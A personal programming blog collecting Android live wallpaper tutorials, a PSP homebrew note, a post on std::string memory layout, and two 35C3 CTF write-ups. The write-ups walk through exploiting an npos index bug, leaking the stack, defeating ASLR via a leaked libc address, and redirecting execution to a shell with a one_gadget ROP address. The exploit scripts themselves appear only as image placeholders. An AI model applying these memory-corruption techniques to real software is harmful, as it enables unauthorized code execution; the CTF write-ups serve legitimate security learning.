The offbeat art of Android live wallpapers

Whether as a mean of utilitarism or pure visual amusement, for a long time live wallpapers felt for me like a niche, stigmatized as battery-draining, or just a triviality that is obscured by the fact that there’s no one I know personally who uses them.

Only recently, stumbling upon this pure diamond I found on Github:

h3liveHOMM 3 themed live wallpaper by Ilya Pomaskin. I recommend building from included gradle files, as it worked fine for me.
https://github.com/IlyaPomaskin/h3lwp

…and refreshing my memories of playing H3:WOG for hours I asked myself a few questions, including:

  • How exactly do you develop one?
  • What did people already accomplish, in the means of creativity on this field?

Well, the first answer can be handed right away.

It boils down to creating an application that:

  • Runs always, even when in background – achieved by creating a Service
  • Does not create a window on its own, draws on existing surface supplied by the system – achieved by creating a Service, that extends specifically WallpaperService.

Only thing you need to do is to provide implementation for a few methods (i.e runonTouchEvent, onVisibilityChanged) of Android SDK’s abstract classes WallpaperService and WallpaperService.Engine, and update your manifest file.

This can be done in any tool of your choice, as whether you’re developing in Unity, LibGDX or Android Studio, when deploying to Android you can always override default manifest file and provide additional java files.

Actually, it is that simple that I created a repository where I placed template files for live wallpapers using mentioned technologies:

https://github.com/dbeef/CreatingAndroidLiveWallpapers

You can clone it and create your live wallpaper right away.
I covered creating those templates in a series of three separate blog posts:

Once you install such application, it will be visible on your device’s wallpaper browser.

Coming into my second question – If it’s easily accessible, then there must be tons of live wallpapers, for which creativity didn’t simply end on:

Let’s take an image, split it into layers, and add the parallax efect!

And it is correct. There’s a wallpaper that takes a GLSL shader on input and uses it as an output. Another one is an iteration of classic 1970 John Conway’s Game of life. The one after draws Conky-like utility information (RAM, CPU, network usage), yet another opens random Wikipedia article (I would fancy one, that would open CPP-reference, though).

shaderEditorWallpaper
ShaderEditor – Allows to input GLSL shader and use it as live wallpaper. https://github.com/markusfisch/ShaderEditor
bouncingDvdDVDLiveWallpaper – Just what you see.
https://github.com/PHELAT/DVDLiveWallpaper

Seemingly, making one’s wallpaper is part of self-expression, like wearing that blue shirt with name of a band you like, or customization, that people tend to make when buying smartphone cases.

FlowersSpaceBattleBe careful, there’s a space battle going on!
https://github.com/jinkg/Style

I offer no conclusion other, than it is a satisfying weekend project to do, when your current project extends to many months and pulls you down.

Creating live wallpaper in Unity

This post is part of my series on Android live wallpapers.
Visit my other blog posts where I cover creating live wallpapers in:

Templates for all three technologies are on my repository:
https://github.com/dbeef/CreatingAndroidLiveWallpapers


After covering live wallpapers in Android Studio (which I recommend to see, for the sake of having reference to the concepts I will use in this post) I had some understanding of what I want to do in Unity, which was:

  • Overriding default AndroidManifest.xml that Unity creates
  • Add one custom Java class, that I will reference from overriden manifest
  • Add another resource xml file

Additionally, as Unity creates its own Activity when exporting as Android Project, I wanted to reference that activity from my Service declared in Java class, so I could render Unity scene when running as wallpaper.

So I created a clean new Unity project and set-up building to Android.

After quick Googling it looked adding my custom Android-specific code to Unity project will be essentially… Creating Assets/Plugins/Android directory (from root of the project) and copying my files there.

When listing files from that directory:

listing_unity

So what I did was copying res, *.java files from of my Android Studio project, omitting SimpleWallpaperActivity.java, as Unity provides its own Activity.

I also omitted AndroidManifest.xml file – as the one provided by Unity (when exporting as Android project) was a bit bloated and it would be more efficient to just copy very specific content that I needed into Unity’s – I copied whole service tag from my Android Studio project and uses-feature tag.

What was still needed at this point is to reference Unity’s activity to render the scene.
As normally I don’t use Unity I gave up after some time and found out existing wallpaper service that utilizes Unity’s activity by PavelDoGreat:

https://github.com/PavelDoGreat/Unity-Android-Live-Wallpaper/blob/master/WallpaperActivity.java

Keeping package name consistent within Unity and overriden classes that I supplied was essential, otherwise some symbols can be undefined.

You can set package name in Unity’s:
Edit -> Project Settings -> Player.

What then? Just hit Unity’s Build and run.

Creating live wallpaper in LibGDX

This post is part of my series on Android live wallpapers.
Visit my other blog posts where I cover creating live wallpapers in:

Templates for all three technologies are on my repository:
https://github.com/dbeef/CreatingAndroidLiveWallpapers


Creating a live wallpaper in LibGDX is only a step further from creating one with Android Studio’s no-activity template (I suggest having a look at my post covering it, as I will mention concepts that I explain there).

There’s a service, but it does not extend directly from WallpaperService – it does from LibGDX’s AndroidLiveWallpaperService, that in fact goes from WallpaperService.

There’s no simple Activity that extends from Activity – there’s one that extends from AndroidApplication.

There’s AndroidManifest.xml with the very same changes as in case of Android Studio project, and drawing happens in LibGDX’s core project (as LibGDX is multi-platform it generates android/ios/core/desktop/html projects, where core shares common part and other are mostly stubs for launching on specific platform).

Creating live wallpaper in Android Studio

This post is part of my series on Android live wallpapers.
Visit my other blog posts where I cover creating live wallpapers in:

Templates for all three technologies are on my repository:
https://github.com/dbeef/CreatingAndroidLiveWallpapers



Open your Android Studio, then on your menu bar, select:

File -> New Project -> Add No Activity.

Just like in the image below:
post_android_studio
Then, name your application as you wish and choose Java as a language (could be in Kotlin, won’t differ in basis of what I cover in this post).
Click finish when you’re done.

Open Project view on your left-side menu, and in path:

app/src/main/java/yourpackagename

Create files:

SimpleWallpaperActivity.java
SimpleWallpaperService.java

Just like on the image below:

post_android_studio_2

Why do we need an Activity and a Service? Android SDK defines them as:

An Activity is a single, focused thing that the user can do. Almost all activities interact with the user, so the Activity class takes care of creating a window for you in which you can place your UI with setContentView(View). (…)
The Activity class is an important part of an application’s overall lifecycle, and the way activities are launched and put together is a fundamental part of the platform’s application model. For a detailed perspective on the structure of an Android application and how activities behave, please read the Application Fundamentals and Tasks and Back Stack developer guides.

Service is an application component that can perform long-running
operations in the background, and it doesn’t provide a user interface.
Another application component can start a service, and it continues to run
in the background even if the user switches to another application.
Additionally, a component can bind to a service to interact with it
and even perform interprocess communication (IPC). For example, a service
can handle network transactions, play music, perform file I/O, or interact
with a content provider, all from the background.

So adding a single Activity is required, and Services are optional and needed in special cases.

From Service’s description one can understand, why is it that live wallpapers need them:
they have to do work in background, unlike most of other Android applications or games.

SDK provides special kind of Service – WallpaperService, that once implemented, will do the effort of drawing when visible.

Documentation describes it as:

A wallpaper service is responsible for showing a live wallpaper behind applications that would like to sit on top of it. This service object itself does very little — its only purpose is to generate instances of Engine as needed. Implementing a wallpaper thus involves subclassing from this, subclassing an Engine implementation, and implementing onCreateEngine() to return a new instance of your engine.

Now, knowing what the files we’ve just created are supposed to contain, let’s provide some source.

SimpleWallpaperActivity.java will be as simple, as:

simplewallpaperactivity…since we don’t need our wallpaper to contain any UI, when running as an application (yes, it will still be runnable and visible in your device’s apps list, and besides, this activity will be run when user requests wallpaper’s settings, as you will find out later).

Real work is done in SimpleWallpaperService.java:

androidstudio3.png

For simplicity I did not bother to use OpenGL in this example, so you will have to do with draw calls to Android’s Canvas instance.

Instances of NDK’s Handler and Java’s Runner are created to handle drawing outside of overriden methods – handler acts as a queue for draw() commands.

Under src/main/res/xml/ create wallpaper.xml:

snip_xml

The comment I added in the xml itself says everything.
Finally, create AndroidManifest.xml:

manifest

There are 3 notable points in this manifest file, that distinguish if from an ordinary application:

  • uses-feature tag in line 39, that requires a device capable of live wallpapers
  • service tag starting from line 8, requiring BIND_WALLPAPER permission
  • meta-data tag, that points to the activity that is run when user requests wallpaper’s settings

Now you can build and install the wallpaper.

As I mentioned, code is on my repository:
https://github.com/dbeef/CreatingAndroidLiveWallpapers

Starting with PSP homebrew!

Result of 24 first hours with psp toolchain.

Just yesterday, I cloned psptoolchain from Github and built it:
https://github.com/pspdev/psptoolchain
And I’m just fluttered to do some programming on it.
Compiled some of shipped samples and tried it on PPSSPP emulator, also cloned & built Minecraft-PSP:
https://github.com/Woolio/Minecraft-PSP

Had some problems though, i.e samples that were shipped needed a flag to be set in their makefile in order to work properly:

USE_PSPSDK_LIBC = 1

Which I took from one of their issues page:

https://github.com/pspdev/pspsdk/issues/26

And in the Minecraft-PSP, I needed to remove linkage with MMIO, since there was no such library provided, and comment out a few functions (which utilized MMIO, but were not called anyway). Here it is:

minecraft.png

And the reflections sample:

reflections

 

My 35C3 CTF writeup IV – stringmaster2

Introduction

Stringmaster2 is a continuation of the previous task, stringmaster1 which I covered here:
https://dbeef.lol/2019/01/27/my-35c3-ctf-writeup-iii-stringmaster1/
I recommend you read it, since I’ll reffer to it in this writeup.

What we find in the distrib folder this time is:

stringmaster2_ls

You may wonder why would they include the libc (against which stringmaster2 is linked), but we’ll come to this soon.
Now, to see what changed in the source from stringmaster1:

stringmaster2_diff

There are two differences:

  1. Code – There’s no spawn_shell function provided this time – we can’t dump its address and overwrite return pointer from the play function with it.
  2. Security measures – Binary is compiled with PIE and stack protector enabled.

PIE stands for Position Independent Executable – which relates to PIC – Position Independent Code, since PIE’s are entirely made from PIC.
On how does it work, you may check on Wikipedia, but what does it change in the context of solving this CTF is:

  • Even if we had the spawn_shell function ready in the binary, this time we couldn’t use its absolute address dumped from the binary like in 1996 task.
  • We can’t just breakpoint at arbitrarily given address using gdb – though we could fix it by recompiling our local stringmaster2 binary if we really wanted to do some inspection.

If stack protector is enabled, on stack frame, before return address and (optionally) frame pointer, there will be placed another value called stack canary. Since buffer overflow attack to redirect code execution, like in the 1996’s writeup, causes overwriting bytes starting at some variable’s address on the stack to the return pointer, values in between will be overwritten, and thus stack canary will change its value.
Compiler will inject code that checks if that value changed, and if so, it will close program to prevent exploiting.
You can read more on that on the Wikipedia:

https://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries

But the good news is – those make no obstacles, since like in stringmaster1, we can overwrite arbitrary bytes on the stack frame, so the canary value won’t be overwritten untill we specifically do it, and for the PIC problem – we don’t have the spawn_shell function in the binary anyway, thus we’ll need to return somewhere else – but where will we?

Return to libc

Return to libc (r2libc) technique bases on replacing return pointer’s value with an address from the C library – it may be execve function, the same which was called in spawn_shell in stringmaster1, it may be any other function or even a specific line of code within those functions!
Calling execve this way would involve overwriting:

stack_frame.jpg

  1. Return pointer, previously storing an address of a line in main function, to which call from play will return.
    It would be overwritten with an address of execve function (8 bytes).
  2. Address after that, would need to point to a literal with “/bin/bash” (where would we find it – later) – 8 bytes.
  3. Again, pointer to a literal with “/bin/bash” – 8 bytes.
  4. Pointer to NULL, which would be 8 zeroed bytes.
  5. Again, pointer to NULL – 8 zeroed bytes.

Where can we find execv address?

regex

Where can we wind the “/bin/bash” literal I mentioned?

st rings

It’s in the libc, just like the execv, but how would it manage to get there?

Let’s download libc sources and find out.
I got mine (version 2.27) from https://ftp.gnu.org/gnu/glibc/.

libc_sourcegrep -rni . -e “/bin/sh” causes recursive searching of “/bin/sh” in current path.

As you see, there are some execve calls involving const char literals “/bin/sh” passed as an argument, which means, that those literals will be eventually stored in the .data section of libc .so file, with pointers to them pushed on the stack when one of those specific call happens.
Now, as we know how to manually craft function call to execve with “/bin/bash” as an argument – I will tell you why we won’t do it in this case – though what we’ve learned will come handy, since what we’ll really do is very similar.

See, when last time we did stringmaster1, swapping bytes to make return pointer store value to spawn_shell was very unstable – program crashed at random, and we only tried to swap 8 bytes!
Swapping all bytes from our manually crafted call stack would involve swapping 40 bytes, not mentioning, we would need to have those 40, mostly different values, somewhere on the leaked stack (and that involves a lot of luck).
What if there would be a way to jump directly to the place where execve(“/bin/bash”) is called in the libc (already with the argument on the stack!) just as we’ve seen in libc sources, without planting function arguments?

Return Oriented Progamming

ROP is the technique I’ve just suggested. Find some place in the existing code that you want to execute, get its address and jump to it. Those places that can be jumped to are called ROP gadgets.

We won’t waste time on finding it manually since there is already a tool specifically for finding execve gadget (though, I’ll make another post about this later), it’s called one_gadget and can be downloaded here:
https://github.com/david942j/one_gadget

After installation, we’ll call one_gadget with path to our libc as an argument:

one_gadget.png

That’s it, we’ve been provided with 3 variants, where registers have different values when calling. We’ll use the first once, but it makes us no difference which one we call.

Return to the plan

So we could use the same python exploit we used before, but with another value of return pointer to substitute (this time the gadget instead of spawn_shell), could we?
Er, no. There’s one last thing I didn’t mention – ASLR, which stands for Address Space Layout Randomization.

The gadget’s address we just took from the libc is an absolute address. It’s an address that takes into account only distance from the beginning of the .so file.
It would be valid only if we added the base libc address to it (the address under which libc is loaded in the system), and the base address changes due to ASLR every time we run the application!
See how the base address changes (ldd runs the program and prints addresses in which libraries are loaded):

ldd_stringmaster

As an experiment, let’s temporarily disable ASLR and invoke ldd once again:

no_aslr.png

As you can see, this time addresses don’t change – how easy it would be to exploit without ASLR! We could just take this permanent base libc address, add absolute address of our gadget and run python script that would change return pointer value.

So in what manner do we defeat ASLR?

Let’s have a detailed look on what’s on stack of a very simple program:

stack_example

I’ve printed first 20 addresses on the stack when I was breakpointed in the main function. As you see, we have plenty of addresses that reffer to the C library!

First one, __libc_csu_init is the frame pointer in our stack frame, second one, <__libc_start_main+231> is the return pointer – the 231 part means that it points to 231-st byte after the beginning of this function. So we return into a libc function, that called our main before, when bootstrapping the process!
If you want some details on why those addresses are here (not of much relevance for further solving of this task), you can see the answer I gave on Stack Overflow:

https://security.stackexchange.com/a/203313

Same thing happens in stringmaster2 case, we return to the <__libc_start_main+231> too, and what’s nice is this symbol is also leaked in stringmaster2.

Now it’s time to add facts:

  • We need libc base address (to which we’ll add absolute address of our gadget)
  • We have absolute (from gdb) and [base + absolute] address of <__libc_start_main+231> (from leak)
  • We can calculate base address!

Our addresses:
gdb_libc_main

__libc_start_main = 0x21AB0
__libc_start_main + 231 = 0x21B97

At which position will we find  <__libc_start_main+231> in stringmaster2’s leak?
At the same we used before, 18-th octet of leaked data is the return pointer, and program tries to return to the <__libc_start_main+231>.

The final algorithm is the same as in stringmaster1, but adding a step before replacing return pointer, because we need to calculate the value with which we will replace:

  1. Get integer value from 8 bytes starting at (17 * 8) index of leaked bytes array
  2. Substract 0x21B97 from that value and assign it to libc_base
  3. Bytes for further replacing are [libc_base + gadget_addr]

That’s how ASLR can be defeated – by leaking some address from libc that we know what it points to (<__libc_start_main+231> in this case).

Final attack

This time I moved the part which sends commands to Client class, but in its essence, code is almost like stringmaster1, besides calculating libc-base.

Summary

So far, it was the most complex task, since it involved:

  • Knowing how libc bootstraps processes – that their flow starts not in your main function, but in _libc_start_main, then it redirects flow to your main, and finally returns to <__libc_start_main+231> in the end, when your main return.
    You can read more on that on this excellent blog:
    http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html
  • Knowing, that because of ASLR, you can’t just use some address extracted from libc, without knowing the base at which libc is loaded at this current process instance.
  • Knowing about ROP gadgets, since crafting a call stack for execve by yourself is too unstable to work with given commands (swapping/replacing bytes on stack).

Resources

If you’re curious how it is, that one process can use libc at different address every instance, but its code itself does not change – read about Global Offset Table and Procedure Linkage Table:

https://en.wikipedia.org/wiki/Global_Offset_Table

Also, I’ll have a look at this:
https://github.com/Gallopsled/pwntools
since it looks popular and it’ll probably ease solving CTF’s.

 

My 35C3 CTF writeup III – stringmaster1

Introduction

As this task is one category higher than the last one (very easy -> easy), I wrote a separate blog post about std::string, as some knowledge about it would be required for this task and I assume you’ve already read it.
Link:
https://dbeef.lol/2019/01/20/stdstring/

After cd-ing to this task’s distrib directory we’ll see a binary and cpp source code, from which we know, that this binary already provides spawn_shell function, though does not call it anywhere, and consists of 2 other functions – play() and main():

sm_3

sm1_main
As play function contains much boilerplate, I’ll omit the noise and post only the most important code from which we’ll deduce a vector of attack:

sm_2

Before I tell you how to exploit a vulnerability that is visible on this picture, let’s first run the binary to show what it prints:

stringmaster1_exe

As you see, it’s a simple game of making two strings equal by gradually replacing/swapping characters.
Now, going back to the code from the image before – you may have already noticed, that the “replace” command does not provide any sanitization of returned index! If you input a character that does not exist in the string the program searches, it’s going to return std::string::npos, which is 8 bytes, 0xFFFFFFFFFFFFFFFF.

That means, that if we try to access
[string’s data pointer address] + [0xFFFFFFFFFFFFFFFF]
we’re going to end up with…
[string’s data pointer address] – minus one byte!
If you don’t get it, I explained pointer overflow in the post linked above.
As a consequence, we’re going to end up writing in string’s length field’s last byte. That will make string’s length to hold ridiculously high value, and allow us to print more information with “print” command:

gibberish
You may wonder – what use do I have from this seemingly random data?

Vector of attack – return pointer overflow

This data provides us 2 important facts:

  • position of return pointer from play function;
    we’ll inject address of spawn_shell there.
  • position and value of a set of bytes that we could use with “swap” command;
    we’ll use them to swap bytes of play’s return pointer

Of course, we won’t do this manually as it’s too cumbersome. We’ll write a python script for that, but before, we’ll need 2 another facts that gdb’s going to provide:

  • spawn_shell address
  • address of instruction that comes just after call to play function in main function; it’s going to be the value of return pointer in play function – from that fact we’ll know which bytes to swap to make it return to spawn_shell instead

First one is a simple matter of:

p_spawn_shell

spawn_shell’s address is 0x00000000004011a7 (left padded to 16 bytes since it’s x86_64 platform I’m working on).
In the second one, we’ve got to disassemble main and find the call to the play function:

calls

As you see, return pointer value’s going to be 0x000000000040246d.

Now we have all the information we need; it’s time for the python script.
I won’t comment about it much since it’s self-commenting, but the algorithm is:

  1. Connect to program (it’s running on a Docker image on port 22224)
  2. Wait untill it sends the command prompt text (and do it every sending of some command)
  3. Send ‘replace X a’ – X since there are no upper case characters in those strings so it’s always safe to pick one of those – ‘a’ since the program seemingly doesn’t crush that much with replacing with a’s – but it’s only arbitrary taken character, any other will do.
  4. Send ‘print’ request to get info of what is after string’s local data pointer
  5. Find index of return pointer (0x40246d) in what ‘print’ returned – I found it manually by printing hex of returned data to console before writing the rest of the script and just hardcoded it, but one can easily code searching for.
  6. Find indexes of 0x40, 0x11, 0xa7 bytes. There’s a chance they will be somewhere in program’s memory, there’s a chance they won’t. If not, just restart the exploit, since the stringmaster1 binary is re-spawned every connection.
  7. Replace return pointer bytes with bytes from indexes we’ve found in the last step
  8. Print ‘exit’ to make it return to spawn_shell
  9. Send ‘ls’
  10. Send ‘cat flag.txt’
  11. Pwned

Final attack

screenshot from 2019-01-27 17-11-19

Summary

Docker was convenient, but I’ll try to implement hacking the binary without docker; hooking python script to stdout, without sockets, just for further experiments.
Also, my python skills need some improvement.

std::string

I started to make my writeup on 35C3-CTF’s task stringmaster1, but as I progressed I realized I’ll need another blog post to cover nuances of std::string without overstretching amount of input for a potential reader. Here we go, std::string byte-after-byte.

std::string in gdb

Imagine such a program:

example_fixed.png

Being compiled in given manner:

string_example_comp

Let’s start it in gdb and decompile main function:

dump_fixed.png

I highlighted 3 addresses: where do they point to?

As you probably know (and if you don’t, here’s a link to the Wikipedia):

The .data segment contains any global or static variables which have a pre-defined value and can be modified. That is any variables that are not defined within a function (and thus can be accessed from anywhere) or are defined in a function but are defined as static so they retain their address across subsequent calls.

Strings’ values that we hardcoded must be provided from somewhere, and addresses that disassembled code utilizes seems to point into .data segment. We can verify it by executing info variables in gdb, and scrolling to surroundings of this address:

data_start.png

As you see, this address is above the __data_start symbol (it has lower address), so it must be declared in the .data section.
Figuring it out would be easier by calling nm string_example, out of gdb (gdb prints much more than we need).
But I am driving off topic, let’s focus on the strings themself.

Let’s breakpoint at some address at the end of the program, after we initialized all three of strings with given values and printed strings’ addresses:

asdasd

So strings’ addresses are:

s1 - 0x7fffffffda90
s2 - 0x7fffffffda70
s3 - 0x7fffffffda50

std::string takes 32 bytes on my x86_64 computer – one can verify that by running a program that prints sizeof std::string.
Since the strings are declared one after another, by printing 3 * 32 bytes after the address of first string, we’ll see all 3 of them:

addresses.png
x/24x 0x7fffffffda90 means: print next 24 [4 byte chunks] after 0x7fffffffda90 address.
You can simply calculate it by [bytes you want to be printed, [32*3] in our case / 4].

Here’s where the action starts.
Since we know that each std::string occupies 32 bytes, I’ll colorize them by different colors and label by variable name:

addresses_2 fixed.png

We know lengths of our strings, which are:

s1 - "123" - 3 - 0x3
s2 - "123456789" - 9 - 0x9
s3 - "1234567890abcdefgh!@#" - 21 - 0x15

Can we identify such bytes on the image? Yes. That’s the 4’th column on the image above:

addresses_3_fixed.png

From looking at the sources (we’ll cover them later) I know, that length should be 64 bit value, so length takes 2 columns (2 x 4 bytes = 64 bits).

What else can be identified?
Individual characters we put into the strings.

Look at the first and second column – 0x34333231 and then 0x38373635, and then 0x39, when converted from ascii values present what that string contain:

decode.png

Marking our finding on the image with ‘d’ character, as an abbreviation from ‘data’:

addresses_4.png

But wait, look at the s3, the longest one – where’s the data we supplied? It doesn’t appear in the same manner as on the other strings… We’ll come to this in a second.
In the meantime – look at the first 4 bytes of our strings, on the second column.
In s2 and s1 it appears, that this value points (stores an address of) to the ‘d’ section.
So this value must be the pointer to the string’s data!
Again, mark our finding to the image with ‘p’, as from ‘pointer’:

addresses_5.png

And that answers the question stated just before – s3‘s data is stored away from the actual string, under 0x00614c20. Printing it reveals the string that we put into s3 before:

values_ee.png

Which make:

sssssss.png

That makes a question: why are some strings stored locally, and some externally, on the heap?*
And a question that watchful reader would state – what’s stored on the column we didn’t mark, between 4th and 8th bytes of std::string?

*We know, that address 0x00614c20 is on the heap, since we can check heap start/end addresses via info proc mappings in gdb:
info proc ma.png

0x00614c20 is bigger than 0x603000, but smaller than 0x635000.

 

std::string in sources

Answer to those questions lies in std::string’s sources.

You can access them, i.e by opening them in your IDE, like CLion – press Ctrl + N and type string – it will look for class definition.
Other way is just printing it from the command line, like:

pygmentize /usr/include/c++/8/bits/basic_string.h

One way or another, we’ll find std::string definition. The chunk which interested me is:

stdstring.png

It defines string’s fields that we’ve marked on images. There’s string’s length, pointer to its data, an array for local data (defined as a union of either capacity or array of 15 bytes) – and the field we couldn’t figure out – allocator_type. Let’s mark it on the image:

That makes sense! The s1 and s2 strings we declared, which both had their data stored locally, have the same bytes in the data_allocator field, and data_allocator of s3 is zeroed.

addresses_6.png

So there’s a different string allocator used, depending on string’s length. Local buffer’s size is 15 bytes, so if we try to allocate a bigger string, like in case of s3, it’s going to allocate on heap instead. This optimization has its name and is called:

small string optimization

If you want to read more about it, here are the sources I used:

https://stackoverflow.com/questions/21694302/what-are-the-mechanics-of-short-string-optimization-in-libc

https://stackoverflow.com/questions/10315041/meaning-of-acronym-sso-in-the-context-of-stdstring/10319672#10319672

https://stackoverflow.com/questions/27631065/why-does-libcs-implementation-of-stdstring-take-up-3x-memory-as-libstdc/28003328#28003328

https://blogs.msmvps.com/gdicanio/2016/11/17/the-small-string-optimization/

There’s more – std::string::npos

As the cpprerefence states:

This is a special value equal to the maximum value representable by the type size_type. The exact meaning depends on context, but it is generally used either as end of string indicator by the functions that expect a string index or as the error indicator by the functions that return a string index.

Note

Although the definition uses 1size_type is an unsigned integer type, and the value of npos is the largest positive value it can hold, due to signed-to-unsigned implicit conversion. This is a portable way to specify the largest value of any unsigned type.

On my x86_64 platform, given program:

nposs

prints:

np

it’s 16 times F, since:

byte = 8 bit, max value is 0b11111111 = 2 ^ 7 + 2^6 + … + 2^0 = 128 + 64 + … + 1 = 255
byte in hex = 0xff, max value is (F * 16 + F) = 15 * 16 + 15= 255.

so in other words – it’s 8 bytes = 64 bits.

But I’m mentioning it since there can be programs that use it without sanitization, like:

printing_npos_add

Which prints:

comp

As the condition we provided lacked checking if index is equal to npos, we’ve overwritten the length of some_string, and consequently made it to try printing all
0x5800000000000003 bytes that proceed address pointed by some_string‘s data pointer.

Let’s make 2 another strings in this program, and check if same thing happen to their lengths:

npos_src_2

That prints:

repeatable

So it’s repeatable! But why? How come, that

some_arbitrary_string[std::string::npos]

points to its length, always?

Well, as you probably know – variables can be overflown, and pointers also.
I’ll give you a short example of unsigned char overflow and then, pointer overflow – since they work in the same way:

overflow_ex.png

It prints:

diff

If we’re adding some value, to the value that’s already a maximum value for this platform, we’ll end up with… ‘some value’ minus 1!

As you learned before in this post, std::string’s length is 8 bytes before its local data. So if we’ll overflow pointer to the local data by adding max value it can hold, we’ll end up 1 byte before its local data, in length’s area, and that’s why some_string[std::string::npos] will always point to its length(…’s last byte)!

Conclusion

I wish I could just find blog post like this on the internet instead of writing it myself.